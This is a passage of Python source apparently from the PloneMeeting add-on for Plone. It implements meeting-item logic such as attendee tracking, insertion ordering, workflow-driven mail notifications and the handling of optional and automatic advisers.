tuple(set(next_excused + next_absents).intersection(\n set(attendees)))\n entered_after = tuple(set(excused + absents).intersection(\n set(next_attendees)))\n res['left_after'] = left_after\n res['entered_after'] = entered_after\n # non attendees\n non_attendee_after = tuple(set(attendees).intersection(\n set(next_non_attendees)))\n attendee_again_after = tuple(set(next_attendees).intersection(\n set(non_attendees)))\n res['non_attendee_after'] = non_attendee_after\n res['attendee_again_after'] = attendee_again_after\n return res\n\n
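# Hedged sketch (illustrative only) of the set arithmetic used in\n # get_in_and_out_attendees above: who \"left\" before an item is the\n # intersection of the previous item's attendees with the current\n # item's absents and excused.\n @staticmethod\n def _demo_left_before(previous_attendees, absents, excused):\n '''E.g. (('hp1', 'hp2'), ('hp2',), ()) -> ('hp2',).'''\n return tuple(set(absents + excused).intersection(set(previous_attendees)))\n\n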
security.declarePublic('mustShowItemReference')\n\n def mustShowItemReference(self):\n '''See doc in interfaces.py'''\n res = False\n item = self.getSelf()\n meeting = item.getMeeting()\n tool = api.portal.get_tool('portal_plonemeeting')\n if meeting and meeting.is_late():\n res = True\n else:\n cfg = tool.getMeetingConfig(item)\n res = cfg.getComputeItemReferenceForItemsOutOfMeeting()\n return res\n\n security.declarePrivate('addRecurringItemToMeeting')\n\n def addRecurringItemToMeeting(self, meeting):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n wfTool = api.portal.get_tool('portal_workflow')\n tool = api.portal.get_tool('portal_plonemeeting')\n try:\n item.REQUEST.set('PUBLISHED', meeting)\n item.isRecurringItem = True\n # we use the wf path defined in the cfg.getTransitionsForPresentingAnItem\n # to present the item to the meeting\n cfg = tool.getMeetingConfig(item)\n # give 'Manager' role to current user to bypass transitions guard\n # and avoid permission problems when transitions are triggered\n with api.env.adopt_roles(['Manager', ]):\n # try to bypass by using the \"validate\" shortcut\n trs = cfg.getTransitionsForPresentingAnItem(\n org_uid=item.getProposingGroup())\n if \"validate\" in get_transitions(item):\n wfTool.doActionFor(item, \"validate\")\n trs = [\"present\"]\n for tr in trs:\n if tr in get_transitions(item):\n wfTool.doActionFor(item, tr)\n # the item must be at least presented to a meeting, otherwise we raise\n if not item.hasMeeting():\n raise WorkflowException\n del item.isRecurringItem\n except WorkflowException as wfe:\n msg = REC_ITEM_ERROR % (item.id, tr, str(wfe) or repr(wfe))\n logger.warn(msg)\n api.portal.show_message(msg, request=item.REQUEST, type='error')\n sendMail(None, item, 'recurringItemWorkflowError')\n unrestrictedRemoveGivenObject(item)\n return True\n\n def _bypass_meeting_closed_check_for(self, fieldName):\n \"\"\"See docstring in interfaces.py\"\"\"\n if fieldName in ['internalNotes', 'marginalNotes']:\n return True\n\n security.declarePublic('mayQuickEdit')\n\n def mayQuickEdit(self,\n fieldName,\n bypassWritePermissionCheck=False,\n onlyForManagers=False,\n bypassMeetingClosedCheck=False,\n raiseOnError=False):\n '''Check if the current p_fieldName can be quick edited through the meetingitem_view.\n By default, an item can be quick edited if the field condition is True (field is used,\n current user is Manager, current item is linked to a meeting) and if the meeting\n the item is presented in is not considered as 'closed'. 
Bypass if current user is\n a real Manager (Site Administrator/Manager).\n If p_bypassWritePermissionCheck is True, we will not check for write_permission.\n If p_bypassMeetingClosedCheck is True, we will not check if meeting is closed but\n only for permission and condition.'''\n field = self.Schema()[fieldName]\n # some fields are still editable even when meeting closed\n bypassMeetingClosedCheck = bypassMeetingClosedCheck or \\\n self.adapted()._bypass_meeting_closed_check_for(fieldName)\n res = checkMayQuickEdit(\n self,\n bypassWritePermissionCheck=bypassWritePermissionCheck,\n permission=field.write_permission,\n expression=self.Schema()[fieldName].widget.condition,\n onlyForManagers=onlyForManagers,\n bypassMeetingClosedCheck=bypassMeetingClosedCheck)\n if not res and raiseOnError:\n raise Unauthorized\n return res\n\n def mayQuickEditItemAssembly(self):\n \"\"\"Show edit icon if itemAssembly or itemAssemblyGuests field editable.\"\"\"\n return self.mayQuickEdit('itemAssembly', bypassWritePermissionCheck=True, onlyForManagers=True) or \\\n self.mayQuickEdit('itemAssemblyGuests', bypassWritePermissionCheck=True, onlyForManagers=True)\n\n def mayQuickEditItemSignatures(self):\n \"\"\"Show edit icon if itemSignatures field editable.\"\"\"\n return self.mayQuickEdit('itemSignatures', bypassWritePermissionCheck=True, onlyForManagers=True)\n\n security.declareProtected(ModifyPortalContent, 'onEdit')\n\n def onEdit(self, isCreated):\n '''See doc in interfaces.py.'''\n pass\n\n security.declarePublic('getCustomAdviceMessageFor')\n\n def getCustomAdviceMessageFor(self, advice):\n '''See doc in interfaces.py.'''\n return {'displayDefaultComplementaryMessage': True,\n 'displayAdviceReviewState': False,\n 'customAdviceMessage': None}\n\n def _getInsertOrder(self, cfg):\n '''When inserting an item into a meeting, several \"methods\" are\n available (follow category order, proposing group order, all groups order,\n at the end, etc). 
If you want to implement your own \"method\", you may want\n to propose an alternative behaviour here, by returning an \"order\",\n or \"weight\" (as an integer value) that you assign to the current item.\n According to this \"order\", the item will be inserted at the right place.\n This method receives the p_cfg.\n '''\n res = []\n item = self.getSelf()\n\n insertMethods = cfg.getInsertingMethodsOnAddItem()\n for insertMethod in insertMethods:\n order = item._findOrderFor(insertMethod['insertingMethod'])\n if insertMethod['reverse'] == '1':\n order = - order\n res.append(order)\n return res\n\n def _findOrderFor(self, insertMethod):\n '''\n Find the order of given p_insertMethod.\n '''\n res = None\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if insertMethod == 'on_list_type':\n listTypes = cfg.getListTypes()\n keptListTypes = [listType['identifier'] for listType in listTypes\n if listType['used_in_inserting_method'] == '1']\n currentListType = self.getListType()\n # if it is not a listType used in the inserting_method\n # return 0 so elements using this listType will always have\n # a lower index and will be passed\n if currentListType not in keptListTypes:\n res = 0\n else:\n res = keptListTypes.index(currentListType) + 1\n elif insertMethod == 'on_categories':\n # get the categories order, pass onlySelectable to False so disabled categories\n # are taken into account also, so we avoid problems with freshly disabled categories\n # or when a category is restricted to a group a MeetingManager is not member of\n res = 1\n category = self.getCategory(True)\n if category:\n res = category.get_order(only_selectable=False)\n elif insertMethod == 'on_classifiers':\n # get the classifiers order, pass onlySelectable to False so disabled classifiers\n # are taken into account also, so we avoid problems with freshly disabled classifiers\n # or when a classifier is restricted to a group a MeetingManager is not member of\n res = 1\n classifier = self.getClassifier(True)\n if classifier:\n res = classifier.get_order(only_selectable=False)\n elif insertMethod == 'on_proposing_groups':\n org = self.getProposingGroup(True)\n res = org.get_order()\n elif insertMethod == 'on_all_groups':\n org = self.getProposingGroup(True)\n res = org.get_order(associated_org_uids=self.getAssociatedGroups(), cfg=cfg)\n elif insertMethod == 'on_groups_in_charge':\n res = self._computeOrderOnGroupsInCharge(cfg)\n elif insertMethod == 'on_all_associated_groups':\n res = self._computeOrderOnAllAssociatedGroups(cfg)\n elif insertMethod == 'on_all_committees':\n res = self._computeOrderOnAllCommittees(cfg)\n elif insertMethod == 'on_privacy':\n privacy = self.getPrivacy()\n privacies = cfg.getSelectablePrivacies()\n # Get the order of the privacy\n res = privacies.index(privacy)\n elif insertMethod == 'on_to_discuss':\n if self.getToDiscuss():\n res = 0\n else:\n res = 1\n elif insertMethod == 'on_other_mc_to_clone_to':\n toCloneTo = self.getOtherMeetingConfigsClonableTo()\n values = get_vocab_values(\n self,\n 'Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary')\n if not toCloneTo:\n res = len(values) + 1\n else:\n res = values.index(toCloneTo[0])\n elif insertMethod == 'on_poll_type':\n pollType = self.getPollType()\n factory = queryUtility(IVocabularyFactory,\n 'Products.PloneMeeting.vocabularies.polltypesvocabulary')\n pollTypes = [term.token for term in factory(self)._terms]\n # Get the order of the pollType\n res = pollTypes.index(pollType)\n elif insertMethod 
== 'on_item_title':\n res = normalize(safe_unicode(self.Title()))\n elif insertMethod == 'on_item_decision_first_words':\n decision = safe_unicode(self.getDecision(mimetype='text/plain')).strip()\n decision = decision.split(' ')[0:INSERTING_ON_ITEM_DECISION_FIRST_WORDS_NB]\n decision = ' '.join(decision)\n res = normalize(safe_unicode(decision))\n elif insertMethod == 'on_item_creator':\n creator_fullname = safe_unicode(tool.getUserName(self.Creator()))\n res = normalize(creator_fullname)\n else:\n res = self.adapted()._findCustomOrderFor(insertMethod)\n return res\n\n def _sort_pre_orders(self, pre_orders):\n \"\"\"Sort given pre_orders and compute final index.\"\"\"\n pre_orders.sort()\n res = float(0)\n divisor = 1\n for pre_order in pre_orders:\n res += (float(pre_order) / divisor)\n # we may manage up to 1000 different values\n divisor *= 1000\n return res\n\n def _computeOrderOnAllAssociatedGroups(self, cfg):\n '''Helper method to compute inserting index when using insert method 'on_all_associated_groups'.'''\n associatedGroups = self.getAssociatedGroups()\n # computing will generate following order :\n # items having no associated groups\n # items having associated group 1 only\n # items having associated group 1 and associated group 2\n # items having associated group 1 and associated group 2 and associated group 3\n # items having associated group 1 and associated group 2 and associated group 3 and associated group 4\n # items having associated group 1 and associated group 3\n # items having associated group 1 and associated group 3 and associated group 4\n # for order, rely on order defined in MeetingConfig if defined, else use organization order\n orderedAssociatedOrgs = cfg.getOrderedAssociatedOrganizations()\n # if order changed in config, we keep it, do not rely on order defined on item\n pre_orders = []\n for associatedGroup in associatedGroups:\n if orderedAssociatedOrgs:\n try:\n index = orderedAssociatedOrgs.index(associatedGroup)\n pre_orders.append(index + 1)\n except ValueError:\n pre_orders.append(0)\n else:\n org = get_organization(associatedGroup)\n pre_orders.append(org.get_order())\n return self._sort_pre_orders(pre_orders)\n\n def _computeOrderOnAllCommittees(self, cfg):\n '''Helper method to compute inserting index when using insert method 'on_all_committees'.'''\n committees = self.getCommittees()\n # computing will generate following order :\n # items having no committee\n # items having committee 1 only\n # items having committee 1 and committee 2\n # items having committee 1 and committee 2 and committee 3\n # items having committee 1 and committee 2 and committee 3 and committee 4\n # items having committee 1 and committee 3\n # items having committee 1 and committee 3 and committee 4\n # for order, rely on order defined in MeetingConfig.committees DataGridField\n ordered_committees = self.getField('committees').Vocabulary(self).keys()\n # if order changed in config, we keep it, do not rely on order defined on item\n pre_orders = []\n for committee in committees:\n try:\n index = ordered_committees.index(committee)\n pre_orders.append(index + 1)\n except ValueError:\n pre_orders.append(0)\n return self._sort_pre_orders(pre_orders)\n\n def _computeOrderOnGroupsInCharge(self, cfg):\n '''Helper method to compute inserting index when using insert method 'on_groups_in_charge'.'''\n groups_in_charge = self.getGroupsInCharge(includeAuto=True)\n # computing will generate following order :\n # items having no groups in charge\n # items having group in charge 1 
only\n        # items having group in charge 1 and group in charge 2\n        # items having group in charge 1 and group in charge 2 and group in charge 3\n        # items having group in charge 1 and group in charge 2 and group in charge 3 and group in charge 4\n        # items having group in charge 1 and group in charge 3\n        # items having group in charge 1 and group in charge 3 and group in charge 4\n        # for order, rely on order defined in MeetingConfig if defined, else use organization order\n        orderedGroupsInCharge = cfg.getOrderedGroupsInCharge()\n        # if order changed in config, we keep it, do not rely on order defined on item\n        pre_orders = []\n        for group_in_charge in groups_in_charge:\n            if orderedGroupsInCharge:\n                try:\n                    index = orderedGroupsInCharge.index(group_in_charge)\n                    pre_orders.append(index + 1)\n                except ValueError:\n                    pre_orders.append(0)\n            else:\n                org = get_organization(group_in_charge)\n                pre_orders.append(org.get_order())\n        return self._sort_pre_orders(pre_orders)\n\n    def _findCustomOrderFor(self, insertMethod):\n        '''\n          Adaptable method when defining our own insertMethod.\n          This is made to be overridden.\n        '''\n        raise NotImplementedError\n\n    def sendStateDependingMailIfRelevant(self, old_review_state, transition_id, new_review_state):\n        \"\"\"Send notifications that depend on old/new review_state.\"\"\"\n        self._sendAdviceToGiveMailIfRelevant(old_review_state, new_review_state)\n        self._sendCopyGroupsMailIfRelevant(old_review_state, new_review_state)\n        # send e-mail to group suffix\n        # both notifications may be enabled in configuration to manage the case when an item\n        # goes back to itemcreated from presented (when using WFA\n        # presented_item_back_to_itemcreated), in this case the history_aware\n        # notification is not sent but the group_suffix notification will be\n        if not self._send_history_aware_mail_if_relevant(\n                old_review_state, transition_id, new_review_state):\n            self._send_proposing_group_suffix_if_relevant(\n                old_review_state, transition_id, new_review_state)\n\n    def _sendAdviceToGiveMailIfRelevant(self,\n                                        old_review_state,\n                                        new_review_state,\n                                        force_resend_if_in_advice_review_states=False,\n                                        debug=False):\n        '''A transition was fired on self, check if advices that did not have to be\n           given in the previous item state now need to be given in the new item state.'''\n        tool = api.portal.get_tool('portal_plonemeeting')\n        cfg = tool.getMeetingConfig(self)\n        if 'adviceToGive' not in cfg.getMailItemEvents() and \\\n           'adviceToGiveByUser' not in cfg.getMailItemEvents():\n            return\n        plone_group_ids = []\n        plone_user_ids = []\n        for org_uid, adviceInfo in self.adviceIndex.iteritems():\n            # call hook '_sendAdviceToGiveToGroup' to be able to bypass\n            # send of this notification to some defined groups\n            if not self.adapted()._sendAdviceToGiveToGroup(org_uid):\n                continue\n            adviceStates = cfg.getItemAdviceStatesForOrg(org_uid)\n            # If force_resend_if_in_advice_review_states=True,\n            # check if current item review_state in adviceStates\n            # This is useful when asking advice again and\n            # item review_state does not change\n            # Ignore advices that must not be given in the current item state\n            # Ignore advices that already needed to be given in the previous item state\n            if (new_review_state not in adviceStates or old_review_state in adviceStates) and \\\n               (not force_resend_if_in_advice_review_states or old_review_state not in adviceStates):\n                continue\n\n            # do not consider groups that already gave their advice\n            if adviceInfo['type'] not in ['not_given', 'asked_again']:\n                continue\n\n            # notify entire advisers groups any time\n            plone_group_id = 
get_plone_group_id(org_uid, 'advisers')\n if 'adviceToGive' in cfg.getMailItemEvents():\n plone_group_ids.append(plone_group_id)\n else:\n # adviceToGiveByUser\n # notify userids if any or the entire _advisers group\n if adviceInfo['userids']:\n plone_user_ids += adviceInfo['userids']\n else:\n plone_group = api.group.get(plone_group_id)\n plone_user_ids += plone_group.getMemberIds()\n\n # send mail\n if plone_group_ids:\n params = {\"obj\": self,\n \"event\": \"adviceToGive\",\n \"value\": plone_group_ids,\n \"isGroupIds\": True,\n \"debug\": debug}\n return sendMailIfRelevant(**params)\n elif plone_user_ids:\n params = {\"obj\": self,\n \"event\": \"adviceToGiveByUser\",\n \"value\": plone_user_ids,\n \"isUserIds\": True,\n \"debug\": debug}\n return sendMailIfRelevant(**params)\n\n def _sendAdviceToGiveToGroup(self, org_uid):\n \"\"\"See docstring in interfaces.py\"\"\"\n return True\n\n def _sendCopyGroupsMailIfRelevant(self, old_review_state, new_review_state):\n '''A transition was fired on self, check if, in the new item state,\n copy groups have now access to the item.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if 'copyGroups' not in cfg.getMailItemEvents():\n return\n\n copyGroupsStates = cfg.getItemCopyGroupsStates()\n # Ignore if current state not in copyGroupsStates\n # Ignore if copyGroups had already access in previous state\n if new_review_state not in copyGroupsStates or old_review_state in copyGroupsStates:\n return\n # Send a mail to every person from getAllCopyGroups\n plone_group_ids = []\n for plone_group_id in self.getAllCopyGroups(auto_real_plone_group_ids=True):\n # call hook '_sendCopyGroupsToGroup' to be able to bypass\n # send of this notification to some defined groups\n if not self.adapted()._sendCopyGroupsToGroup(plone_group_id):\n continue\n plone_group_ids.append(plone_group_id)\n if plone_group_ids:\n return sendMailIfRelevant(self, 'copyGroups', plone_group_ids, isGroupIds=True)\n\n def _sendCopyGroupsToGroup(self, groupId):\n \"\"\"See docstring in interfaces.py\"\"\"\n return True\n\n def _get_proposing_group_suffix_notified_user_ids_for_review_state(\n self,\n review_state,\n excepted_manager=True\n ):\n \"\"\"\n Get all notified members ids of the proposing group suffix for a given 'review_state'\n If 'excepted_manager' is True we omit the manager(s).\n \"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n suffix_notified = cfg.getItemWFValidationLevels(states=[review_state])[\"suffix\"]\n plone_group_id_notified = get_plone_group_id(self.getProposingGroup(), suffix_notified)\n plone_group_notified = api.group.get(plone_group_id_notified)\n\n notified_user_ids = []\n if not excepted_manager:\n notified_user_ids = plone_group_notified.getMemberIds()\n else:\n for member in plone_group_notified.getGroupMembers():\n user_roles = member.getRolesInContext(self)\n if 'MeetingManager' not in user_roles:\n notified_user_ids.append(member.getId())\n return notified_user_ids\n\n def _send_proposing_group_suffix_if_relevant(\n self,\n old_review_state,\n transition_id,\n new_review_state):\n \"\"\"\n Notify by mail the proposing group suffix that will take care of this item in 'new_review_state'\n \"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n\n mail_event_id = \"item_state_changed_{}__proposing_group_suffix\".format(transition_id)\n is_notify_pg_suffix = mail_event_id in cfg.getMailItemEvents()\n 
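\n        # e.g. (illustrative transition id 'propose'): the looked-up event ids are\n        # 'item_state_changed_propose__proposing_group_suffix' and the same id\n        # suffixed with '_except_manager' to skip MeetingManagers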
\n        mail_event_id_except_manager = mail_event_id + \"_except_manager\"\n        is_notify_pg_suffix_excepted_manager = mail_event_id_except_manager in cfg.getMailItemEvents()\n\n        if not is_notify_pg_suffix and not is_notify_pg_suffix_excepted_manager:\n            return\n\n        notified_user_ids = self._get_proposing_group_suffix_notified_user_ids_for_review_state(\n            new_review_state,\n            is_notify_pg_suffix_excepted_manager\n        )\n        if is_notify_pg_suffix:\n            return sendMailIfRelevant(self, mail_event_id, notified_user_ids, isUserIds=True)\n        else:\n            return sendMailIfRelevant(self, mail_event_id_except_manager, notified_user_ids, isUserIds=True)\n\n    def _send_history_aware_mail_if_relevant(self, old_review_state, transition_id, new_review_state):\n        \"\"\"\n        Notify by mail one specific user (if possible) based on the item history.\n        For \"up\" transition, we will notify the user that made the preceding 'back_transition'\n        to 'old_review_state'.\n        If it is the first time the item goes to 'new_review_state',\n        we notify the proposing group suffix (except manager) because we can't predict the future.\n        For \"down\" transition, we will notify the user that made the preceding 'leading_transition'\n        to 'old_review_state'.\n        \"\"\"\n        tool = api.portal.get_tool('portal_plonemeeting')\n        cfg = tool.getMeetingConfig(self)\n        mail_event_id = \"item_state_changed_{}__history_aware\".format(transition_id)\n        # we only consider the item validation process, if old_review_state is\n        # outside, like for example when using the 'presented_item_back_to_itemcreated'\n        # WFAdaptation, we bypass\n        if mail_event_id not in cfg.getMailItemEvents() or \\\n           old_review_state not in cfg.getItemWFValidationLevels(data=\"state\") + [\"validated\"]:\n            return\n\n        wf_direction = down_or_up_wf(self)\n        notified_user_ids = []\n        if wf_direction == \"up\":\n            # We are going up (again) so we will notify the user that made any transition\n            # after the last p_transition_id\n            wf_action_to_find = cfg.getItemWFValidationLevels(states=[old_review_state])[\n                \"back_transition\"]\n            wf_action = getLastWFAction(self, wf_action_to_find)\n            if wf_action:  # In case WF definition has changed in the meantime\n                notified_user_ids = [wf_action[\"actor\"]]\n        elif wf_direction == \"down\":\n            # We are going down so we will notify the user that made the preceding 'leading_transition'\n            # to the 'old_review_state'\n            wf_action_to_find = cfg.getItemWFValidationLevels(states=[old_review_state])\n            if wf_action_to_find:\n                wf_action_to_find = wf_action_to_find[\"leading_transition\"]\n            elif old_review_state == \"validated\":\n                # special management when going down from \"validated\"\n                # as this information is not in the \"itemWFValidationLevels\"\n                # but we know that the leading_transition is always \"validate\"\n                wf_action_to_find = \"validate\"\n            else:\n                raise Exception(\"Unable to find leading transition!\")\n\n            wf_action = getLastWFAction(self, wf_action_to_find)\n            if wf_action:  # In case WF definition has changed in the meantime\n                notified_user_ids = [wf_action[\"actor\"]]\n            else:\n                # We can't predict who will take care of the item after the transition so we notify\n                # the proposing group\n                notified_user_ids = self._get_proposing_group_suffix_notified_user_ids_for_review_state(\n                    new_review_state\n                )\n\n        return sendMailIfRelevant(self, mail_event_id, notified_user_ids, isUserIds=True)\n\n    security.declarePublic('sendAdviceDelayWarningMailIfRelevant')\n\n    def sendAdviceDelayWarningMailIfRelevant(self, group_id, old_adviceIndex):\n        ''' '''\n        def _delay_in_alert(adviceInfo, old_adviceInfo):
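\n            # assumed reading of the condition below: with delay_left_alert set to\n            # '2', the alert is triggered when left_delay just changed and is now\n            # between -1 and 2 inclusive\n            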
\"\"\" \"\"\"\n left_delay = adviceInfo['delay_infos']['left_delay']\n old_left_delay = old_adviceInfo['delay_infos']['left_delay']\n delay_left_alert = adviceInfo['delay_left_alert']\n return (left_delay != old_left_delay) and \\\n (delay_left_alert.isdigit() and\n left_delay >= -1 and\n left_delay <= int(delay_left_alert))\n\n def _just_timed_out(adviceInfo, old_adviceInfo):\n \"\"\" \"\"\"\n return adviceInfo['delay_infos']['delay_status'] == 'timed_out' and \\\n not old_adviceInfo['delay_infos']['delay_status'] == 'timed_out'\n\n # now that new delay is computed, check if we need to send an email notification\n # only notify one time, when 'left_delay' changed and if it is <= 'delay_left_alert'\n # when _updateAdvices is called several times, delay_infos could not exist in old_adviceIndex\n adviceInfo = self.adviceIndex[group_id]\n # first time group_id is added to adviceIndex, it does not exist in old_adviceIndex\n old_adviceInfo = old_adviceIndex.get(group_id, {})\n if adviceInfo.get('delay_infos', {}) and \\\n old_adviceInfo.get('delay_infos', {}) and \\\n not self._advice_is_given(group_id):\n # take also into account freshly expired delays\n just_timed_out = _just_timed_out(adviceInfo, old_adviceInfo)\n if _delay_in_alert(adviceInfo, old_adviceInfo) or just_timed_out:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n left_delay = adviceInfo['delay_infos']['left_delay']\n limit_date = adviceInfo['delay_infos']['limit_date_localized']\n event_id = 'adviceDelayWarning'\n if left_delay == -1 or just_timed_out:\n event_id = 'adviceDelayExpired'\n\n if event_id in cfg.getMailItemEvents():\n plone_group_id = '{0}_advisers'.format(group_id)\n sendMailIfRelevant(\n self,\n event_id,\n [plone_group_id],\n mapping={\n 'left_delay': left_delay,\n 'limit_date': limit_date,\n 'group_name': self.adviceIndex[group_id]['name'],\n 'delay_label': self.adviceIndex[group_id]['delay_label']},\n isGroupIds=True)\n\n def getUnhandledInheritedAdvisersData(self, adviserUids, optional):\n \"\"\" \"\"\"\n predecessor = self.get_predecessor()\n res = []\n for adviserUid in adviserUids:\n # adviserId could not exist if we removed an inherited initiative advice for example\n if not predecessor.adviceIndex.get(adviserUid, None):\n continue\n if (optional and not predecessor.adviceIndex[adviserUid]['optional']):\n continue\n res.append(\n {'org_uid': predecessor.adviceIndex[adviserUid]['id'],\n 'org_title': predecessor.adviceIndex[adviserUid]['name'],\n 'gives_auto_advice_on_help_message':\n predecessor.adviceIndex[adviserUid]['gives_auto_advice_on_help_message'],\n 'row_id': predecessor.adviceIndex[adviserUid]['row_id'],\n 'delay': predecessor.adviceIndex[adviserUid]['delay'],\n 'delay_left_alert': predecessor.adviceIndex[adviserUid]['delay_left_alert'],\n 'delay_label': predecessor.adviceIndex[adviserUid]['delay_label'],\n 'userids': predecessor.adviceIndex[adviserUid].get('userids', [])})\n return res\n\n security.declarePublic('getOptionalAdvisers')\n\n def getOptionalAdvisers(self, computed=False, **kwargs):\n '''Override MeetingItem.optionalAdvisers accessor\n to handle p_computed parameters that will turn a \"__userid__\" value\n to it's corresponding adviser value.'''\n optionalAdvisers = self.getField('optionalAdvisers').get(self)\n if computed:\n res = []\n for adviser in optionalAdvisers:\n if \"__userid__\" in adviser:\n value, user_id = adviser.split(\"__userid__\")\n res.append(value)\n else:\n res.append(adviser)\n optionalAdvisers = res\n return 
optionalAdvisers\n\n security.declarePublic('getOptionalAdvisersData')\n\n def getOptionalAdvisersData(self):\n '''Get optional advisers but with same format as getAutomaticAdvisersData\n so it can be handled easily by the updateAdvices method.\n We need to return a list of dict with relevant informations.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = []\n optionalAdvisers = self.getOptionalAdvisers()\n for adviser in self.getOptionalAdvisers(computed=True):\n # if this is a delay-aware adviser, we have the data in the adviser id\n if '__rowid__' in adviser:\n org_uid, row_id = decodeDelayAwareId(adviser)\n customAdviserInfos = cfg._dataForCustomAdviserRowId(row_id)\n delay = customAdviserInfos['delay']\n delay_left_alert = customAdviserInfos['delay_left_alert']\n delay_label = customAdviserInfos['delay_label']\n else:\n org_uid = adviser\n row_id = delay = delay_left_alert = delay_label = ''\n # manage userids\n userids = [optionalAdviser.split('__userid__')[1]\n for optionalAdviser in optionalAdvisers\n if '__userid__' in optionalAdviser and\n optionalAdviser.startswith(adviser)]\n res.append({'org_uid': org_uid,\n 'org_title': get_organization(org_uid).get_full_title(),\n 'gives_auto_advice_on_help_message': '',\n 'row_id': row_id,\n 'delay': delay,\n 'delay_left_alert': delay_left_alert,\n 'delay_label': delay_label,\n 'userids': userids})\n return res\n\n security.declarePublic('getAutomaticAdvisersData')\n\n def getAutomaticAdvisersData(self):\n '''Who are the automatic advisers for this item? We get it by\n evaluating the TAL expression on current MeetingConfig.customAdvisers and checking if\n corresponding group contains at least one adviser.\n The method returns a list of dict containing adviser infos.'''\n extra_expr_ctx = _base_extra_expr_ctx(self)\n cfg = extra_expr_ctx['cfg']\n res = []\n for customAdviser in cfg.getCustomAdvisers():\n # check if there is something to evaluate...\n strippedExprToEvaluate = customAdviser['gives_auto_advice_on'].replace(' ', '')\n if not strippedExprToEvaluate or strippedExprToEvaluate == 'python:False':\n continue\n # respect 'for_item_created_from' and 'for_item_created_until' defined dates\n createdFrom = customAdviser['for_item_created_from']\n createdUntil = customAdviser['for_item_created_until']\n # createdFrom is required but not createdUntil\n if DateTime(createdFrom) > self.created() or \\\n (createdUntil and DateTime(createdUntil) < self.created()):\n continue\n\n # Check that the TAL expression on the group returns True\n eRes = False\n org = get_organization(customAdviser['org'])\n extra_expr_ctx.update({'item': self, 'org': org, 'org_uid': customAdviser['org']})\n eRes = _evaluateExpression(\n self,\n expression=customAdviser['gives_auto_advice_on'],\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=False,\n error_pattern=AUTOMATIC_ADVICE_CONDITION_ERROR)\n\n if eRes:\n res.append({'org_uid': customAdviser['org'],\n 'org_title': org.get_full_title(),\n 'row_id': customAdviser['row_id'],\n 'gives_auto_advice_on_help_message':\n customAdviser['gives_auto_advice_on_help_message'],\n 'delay': customAdviser['delay'],\n 'delay_left_alert': customAdviser['delay_left_alert'],\n 'delay_label': customAdviser['delay_label'],\n # userids is unhandled for automatic advisers\n 'userids': []})\n # check if the found automatic adviser is not already in the self.adviceIndex\n # but with a manually changed delay, aka\n # 
'delay_for_automatic_adviser_changed_manually' is True\n storedCustomAdviser = self.adviceIndex.get(customAdviser['org'], {})\n delay_for_automatic_adviser_changed_manually = \\\n 'delay_for_automatic_adviser_changed_manually' in storedCustomAdviser and \\\n storedCustomAdviser['delay_for_automatic_adviser_changed_manually'] or False\n if storedCustomAdviser and \\\n not storedCustomAdviser['row_id'] == customAdviser['row_id'] and \\\n delay_for_automatic_adviser_changed_manually and \\\n not storedCustomAdviser['optional']:\n # we have an automatic advice for relevant group but not for current row_id\n # check if it is from a linked row in the MeetingConfig.customAdvisers\n isAutomatic, linkedRows = cfg._findLinkedRowsFor(customAdviser['row_id'])\n for linkedRow in linkedRows:\n if linkedRow['row_id'] == customAdviser['row_id']:\n # the found advice was actually linked, we keep it\n # adapt last added dict to res to keep storedCustomAdviser value\n res[-1]['row_id'] = storedCustomAdviser['row_id']\n res[-1]['gives_auto_advice_on_help_message'] = \\\n storedCustomAdviser['gives_auto_advice_on_help_message']\n res[-1]['delay'] = storedCustomAdviser['delay']\n res[-1]['delay_left_alert'] = storedCustomAdviser['delay_left_alert']\n res[-1]['delay_label'] = storedCustomAdviser['delay_label']\n return res\n\n security.declarePrivate('addAutoCopyGroups')\n\n def addAutoCopyGroups(self, isCreated):\n '''What group should be automatically set as copyGroups for this item?\n We get it by evaluating the TAL expression on every active\n organization.as_copy_group_on. The expression returns a list of suffixes\n or an empty list. The method update existing copyGroups and add groups\n prefixed with AUTO_COPY_GROUP_PREFIX.'''\n # empty stored autoCopyGroups\n self.autoCopyGroups = PersistentList()\n extra_expr_ctx = _base_extra_expr_ctx(self)\n cfg = extra_expr_ctx['cfg']\n for org_uid, expr in cfg.get_orgs_with_as_copy_group_on_expression().items():\n extra_expr_ctx.update({'item': self, 'isCreated': isCreated})\n suffixes = _evaluateExpression(\n self,\n expression=expr,\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=False,\n error_pattern=AS_COPYGROUP_CONDITION_ERROR)\n if not suffixes or not isinstance(suffixes, (tuple, list)):\n continue\n # The expression is supposed to return a list a Plone group suffixes\n # check that the real linked Plone groups are selectable\n for suffix in suffixes:\n if suffix not in get_all_suffixes(org_uid):\n # If the suffix returned by the expression does not exist\n # log it, it is a configuration problem\n logger.warning(AS_COPYGROUP_RES_ERROR.format(suffix, org_uid))\n continue\n plone_group_id = get_plone_group_id(org_uid, suffix)\n auto_plone_group_id = '{0}{1}'.format(AUTO_COPY_GROUP_PREFIX, plone_group_id)\n self.autoCopyGroups.append(auto_plone_group_id)\n\n def _evalAdviceAvailableOn(self, available_on_expr, mayEdit=True):\n \"\"\" \"\"\"\n extra_expr_ctx = _base_extra_expr_ctx(self)\n extra_expr_ctx.update({'item': self, 'mayEdit': mayEdit})\n res = _evaluateExpression(\n self,\n expression=available_on_expr,\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=True,\n error_pattern=ADVICE_AVAILABLE_ON_CONDITION_ERROR)\n return res\n\n security.declarePrivate('listItemInitiators')\n\n def listItemInitiators(self):\n '''Initiator may be an organization or a held_position.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = []\n # missing 
